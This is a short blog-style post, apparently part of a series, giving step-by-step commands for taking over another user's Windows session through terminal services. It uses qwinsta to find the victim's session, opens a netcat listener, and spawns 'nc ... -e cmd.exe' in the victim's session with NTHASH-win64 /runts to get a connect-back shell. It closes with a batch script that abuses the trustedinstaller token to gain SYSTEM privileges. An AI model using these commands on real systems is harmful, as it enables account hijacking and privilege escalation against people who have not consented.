In previous article we have (ab)used windows tokens to steal someone else account.
Lets see a different way to perform this task (ab)using terminal services.
1.Retrieve the session id of your victim with qwinsta
2.Open a shell (within the attacker session) to which your victim will connect to : nc -L -vv -p 9000
3.Spawn a process within your victim session which will connect back to your shell : NTHASH-win64.exe /runts /user:session_id /binary:nc 127.0.0.1 9000 -e cmd.exe
And again, enjoy the output of your whoami.
Note that you need special privileges (SeTcbPrivilege) to perform step 3 – my preference goes to using a « trustedinstaller » session (but many other context will do like winlogon, etc).
If need be, the below batch will create a new shell with proper privileges to perform step 3 above.
net start trustedinstaller
for /F "tokens=1" %%K in (' nthash-win64 /enumproc ^| findstr /i "trustedinstaller" ') do ( nthash-win64 /runastoken /pid:%%K /system )